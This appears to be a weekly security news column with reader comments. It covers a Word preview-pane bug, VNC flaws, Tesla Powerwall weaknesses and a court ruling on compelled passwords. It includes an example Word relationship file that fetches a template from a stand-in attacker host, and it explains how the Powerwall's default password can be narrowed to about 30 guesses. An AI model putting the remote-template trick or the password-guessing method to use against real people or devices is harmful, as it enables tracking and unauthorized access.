Malware embedded in office documents has been a popular attack vector for years. Many of those attacks have since been fixed, and essentially all the current ones are unworkable when a document is opened in protected view. There are ways around this, like putting a notice at the top of a document asking the user to turn off protected view. [Curtis Brazzell] has been researching phishing, and how attacks can work around mitigations like protected view. He noticed that one of his booby-trapped documents phoned home before it was ever opened. How, exactly? The preview pane.
The Windows Explorer interface has a built-in preview pane, and it helpfully supports Microsoft Office formats. The problem is that the preview isn’t generated using protected view, at least when previewing Word documents. Generating the preview is enough to trigger loading of remote content, and could feasibly be used to trigger other vulnerabilities. [Curtis] notified Microsoft about the issue, and the response was slightly disappointing. His discovery is officially considered a bug, but not a vulnerability.
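For context, the usual way a Word document "phones home" is through an external relationship, such as a remotely attached template, which Word fetches when the document is rendered. A minimal sketch of such a relationship, as it would appear in the document's `word/_rels/settings.xml.rels` (the target URL is a placeholder, not from the research):

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <!-- External template reference: rendering the document triggers an HTTP request -->
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://attacker.example/canary.dotx"
    TargetMode="External"/>
</Relationships>
```

Protected view normally blocks this fetch; the preview pane apparently does not.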
Researchers at Kaspersky took a hard look at several VNC implementations, and uncovered a total of 37 CVEs so far. It seems that several VNC projects share a rather old code-base, and it contains a plethora of potential bugs. VNC should be treated similarly to RDP — don’t expose it to the internet, and don’t connect to unknown servers. The protocol wasn’t written with security in mind, and none of the implementations have been sufficiently security hardened.
Examples of the flaws include checking that a message doesn’t overflow the buffer only after it has already been copied into said buffer. Another code snippet reads a variable-length message into a fixed-length buffer without any length check. That particular function was originally written at AT&T Labs back in the late 90s, and has been copied into multiple projects since then.
There is a potential downside to open source highlighted here: open source allows poorly written code to spread. This isn’t a knock against open source, but rather a warning to the reader. Just because code or a project uses an OSS license doesn’t mean it’s secure or high quality code. There are more vulnerabilities still in the process of being fixed, so watch for the rest of this story.
And since we’re talking about security fails, Tesla’s Powerwall contained a few of them. It’s unclear how many of these have been fixed with firmware updates, but the researchers at The Hacker’s Choice just released the results of their testing.
The highlight of the work is the hard-coded wifi password, set to the unit’s serial number. The problem is that the serial number follows a known format:
ST<YY><L>0001<XYZ>. “YY” is the year of manufacture. Production only goes back to 2015, so there are only 5 possible options. “L” is the revision, with only 6 values seen in the wild so far. The last 7 digits appear to be a linearly incrementing number, with only values between 1000 and 2000 seen. The real kicker is that the wifi network name appears to contain the last 3 digits of the serial number, giving that information away for free. For those keeping track at home, that means an attacker trying to connect to a Powerwall’s wifi network has only 30 possible passwords to try in this best-case scenario.
How bad could it be for an attacker to gain access to a Powerwall’s network? There is a web-based management interface that uses the same password as the wifi. This interface has all sorts of useful functions, like inverting the power sensor logic. That option probably exists to work around a hapless electrician who installed the sensor clamp backwards, but different combinations of inversion lead to various interesting results, like pushing power to the grid when the battery should be charging, or pulling power from it instead. Another fun option is changing the power output to the home to another country’s standard. Doubling the voltage or changing the power frequency could be disastrous.
While this research was just published, the firmware tested appears to be from late 2017, with multiple updates released since then. Tesla hasn’t published details about security fixes in their firmware releases, so it’s hard to know how many of the problems presented here have been fixed.
Passwords, Freedom, and Self-incrimination
A legal fight has been slowly brewing in the US over the last few years. The central question is this: Does the Constitutionally guaranteed right against self-incrimination apply to passwords? Courts have been testing this issue for years, but so far a case has not come before the US Supreme Court. Prior cases have applied something known as the “Foregone Conclusion Exception”. This essentially means that with a warrant, police can compel an individual to turn over documentation that is known to exist. The Pennsylvania Supreme Court weighed in on the issue recently, and found that the act of giving a password is inherently testimonial, and therefore protected under the 5th Amendment.
No person…shall be compelled in any criminal case to be a witness against himself….
This is yet another case of the difficulty of applying laws and rulings from before the computer revolution. If the password were instead a combination to a safe, it would be easy enough to open that safe through various means, even without the cooperation of the individual. Modern encryption is an entirely different realm, where decryption without the password is computationally infeasible. This latest ruling rejects the notion that the foregone conclusion exception can apply to a password. The issue will likely be decided at the US Supreme Court eventually.
We’re running this weekend because of Thanksgiving, but keep your eyes peeled Friday mornings for This Week in Security, and we’ll keep you up to date with these stories and more.
29 thoughts on “This Week In Security: Malicious Previews, VNC Vulnerabilities, Powerwall, And The 5th Amendment”
There is no “YY” or “L” in “ST0001″… Does anybody really review those articles before posting?
Oy, thanks for pointing that out. Adding text with brackets is difficult, because the WordPress editor sees them as malformed html tags and removes them.
Nope. Not a single person. It’s incredible.
Malware. Waiting for the time when it will all start with healthware.
“Just because code or a project uses an OSS license doesn’t mean it’s secure or high quality code.”
It also doesn’t mean that project has ever been security audited by someone that knows what they’re doing. Open source is not inherently more secure than closed source in practice, only in theory, and that theory comes with a lot of caveats. One of them is that it requires enough eyes looking at the source code to catch problems like this. Linux, Python, GCC, etc. all have plenty of eyes, but that niche library for a specific microcontroller probably doesn’t. Obviously this library didn’t either, despite being widely used.
Yep, that’s exactly what I was getting at.
The other side of that coin is that closed source software has examples that are just as ugly, but we don’t get to audit those.
Agreed. It’s a lot harder, and the skill bar a lot higher, to reverse engineer proprietary products.
The question of auditing is yet another red herring. Most users can’t or won’t, because it costs unreasonable amounts of time and money. There’s no advantage in being able to look inside the box – since you don’t understand what’s in there anyhow. So what if some guy somewhere spots a security flaw in the software you’re using – what are you going to do about it? What -can- you do about it?
Absolutely nothing. Just wait and hope it gets patched.
With Open Source, it’s easier to find exploitable flaws – for both the good guys and the bad guys. The question is simply whether the good guys are motivated and competent enough to find the security flaws first.
Did you read TFA? Researchers at Kaspersky audited the code, because it was open source, and found a boatload of bugs that are getting fixed.
You miss the point. Most software is never audited. You’re still relying on third parties to do it for you, if they’re interested enough.
Or, to put it otherwise, you’re fundamentally relying on the original supplier/author of the software to do a good job. If they haven’t, then you don’t want everyone else seeing the code, because then you’re in a race over who finds the holes first.
And that’s a bad gamble, because the people who are helping you have less incentive and reward from doing so, than the people who are trying to harm you, so obviously there’s more people trying to break in than trying to fix the holes. That’s why there’s no real advantage for security in open source software.
@Luke: Citation needed.
Why are the police looking for documentation? Did they buy black market software?
Or are they looking for documents?
WHY WHY WHY does the Powerwall allow changing the output voltage and direction in software? Just make them DIP switches in the unit. That still allows for the hapless tech, but never allows a third party (or homeowner) to remotely change it. It will never be changed after install. Just use DIP switches.
Likely so it can be fixed by the remote tech that finalizes the installation. I would assume Tesla has it worked out so the Powerwalls can be installed without a Tesla employee ever showing up on site.
Presumably they know where the product is being installed, because they know who they sold it to, so can’t they just flip the switch at the production line?
When would there ever be need to switch the voltage standard?
As long as the DIP switches aren’t near any of the high voltage bits, just ask the guy on site (there will be one) to change the position for you. Someone has to bolt the thing to the wall and connect the cables. If they can do that, then they can also call into Tesla and flip a DIP switch. I’m probably broken from my industrial background though. All the Powerwall really is, is a giant VFD plus a couple of extras for the battery charging circuit.
Seems like every 5 years things build up to everyone saying “The ONLY way to do remote stuff is VNC…” then it has a security scare and I think, shame, maybe I’ll wait until it’s mature, 4 years pass, everyone saying it’s the only way to get crap done again, think I ought to look into it again and before I get my ass in gear, damn, the same eleventy security holes it had before, gah… in the three tween years, nobody seems to have a bad thing to say about it.
Use VNC over SSH tunneling or a VPN. Don’t leave an open VNC service exposed to the internet.
yep vnc over SSH tunnel. on the very rare occasion I need access to the desktop at work when I’m not there. most good vnc clients support it too so it’s very convenient once set up.
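A minimal sketch of that setup, with placeholder hostnames and the default VNC display port:

```sh
# Forward local port 5901 to the VNC server's loopback port over SSH.
# "user" and "remote-host" are placeholders; the VNC server itself
# should listen only on 127.0.0.1 so it is never exposed directly.
ssh -L 5901:localhost:5901 -N user@remote-host

# Then point the VNC client at the local end of the tunnel:
#   vncviewer localhost:5901
```

The `-N` flag keeps the session open for forwarding only, without running a remote shell.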
There used to be a web site featuring a large number of publicly accessible VNC servers on the Internet. Can’t remember/find the URL now, but when I looked at it, some of the things exposed were somewhat important.
vinagre tunnels VNC over SSH, which seems a very reasonable solution.
>”Modern encryption is an entirely different realm”
No it’s not. It’s perfectly analogous to someone hiding evidence and refusing to say where it is. If the person went through enough trouble to cover their tracks, you’ll never find it without their co-operation.
Modern encryption is an entirely different realm than opening a safe. We’ve even covered brute-force safe cracking: https://hackaday.com/2017/03/27/safe-cracking-is-nates-latest-rd-project/ They opened it in less than an hour, btw.
Yeah, but we don’t have to compare it to a safe.
This is not a “case of the difficulty of applying laws and rulings from before the computer revolution”. Our legal systems have had to deal with this exact issue since antiquity, and it is exactly because of it that the rule against self-incrimination was made.
Otherwise you’d run into Kafkaesque trials where you’d be thrown into prison for not admitting information that would land you in prison anyway. You couldn’t win, because the accuser could simply make it up and condemn you for your refusal to admit it.
Likewise here: this is not a case where the old legal system is unable to deal with new methods of hiding evidence. It’s working exactly as it should. Again, you could be accused of withholding a key to an encrypted file that holds incriminating information about yourself. If you deny knowing the key, because you really don’t, they could accuse you of lying to the court, obstructing justice, etc.
Good point. Kicking around on my old drives are probably encrypted first drafts of a contract or two that I didn’t even bother keeping the password to, because they were rapidly superseded. But you’re doing disk housekeeping and don’t immediately recall what a file is, so you leave it in case you remember later. Files of random noise from the entropy pool you created to mess around with something look like highly encrypted stuff to mister plod. Fragments of blocks undeleted forensically, from when you were messing around with dogecoin, look like secret squirrel shit, kiddo. Even highly encrypted steganographic content that someone put in a random image online, which you thought was a stock image you could use for something, or that is sitting in your browser cache.
I don’t believe for a second that encrypted data in court cases is not decryptable without a password. I believe it is quite easy using very secret methods which are reserved only for very high priority cases. Revealing the method burns it therefore it remains secret until a sufficiently high priority case presents itself – Think: National security, protecting the baldwins, subverting freedom as needed to establish global power and one world government. I believe this era will be looked back upon as the era when every single internet-connected device was compromised, since the beginning – And no one knew it until it didn’t matter anymore. The question is, what does that “didn’t matter any more” future look like? I fear that it is something like a cross between Half Life 2 and The Walking Dead. Better build up a tolerance for those shock sticks ahead of time so we can withstand the beatings all the way to the soup line, don’t want to be late, the early bird gets the warmest soup…
Obviously somebody knows it, otherwise it couldn’t be used. Quite many people have to know about it, because otherwise when such high profile cases present themselves, none of the people involved would know that the method even exists.
Which then goes back to people being bad at keeping secrets.
The basic argument is that conspiracies can be revealed by simple accident, and the odds go against you the more people you involve in your conspiracy. Even if the probability of an accident is something small like 4 in a million per person, with a thousand people involved, the odds of someone accidentally blurting it out rise to about 1 in 250.
The point where the conspiracy is most likely to be revealed is when you have to pass it to the next generation. You take a huge gamble in introducing new people into the system.
IMO China is trying to compromise at the hardware end, Russia at the software end, and the US likes its little black boxes in data centers. Not that there isn’t some mix and match there.
But anyway, it may burn you for medium priority cases if it’s something easy and they can use parallel construction to conceal the original source.
Some stuff is gonna be like ultra, because foreign governments use it or similar systems and they don’t want the statistical analysis to show up unlikely peaks in conviction rates, giving it away to anyone willing to do the number crunching, i.e. the other guys.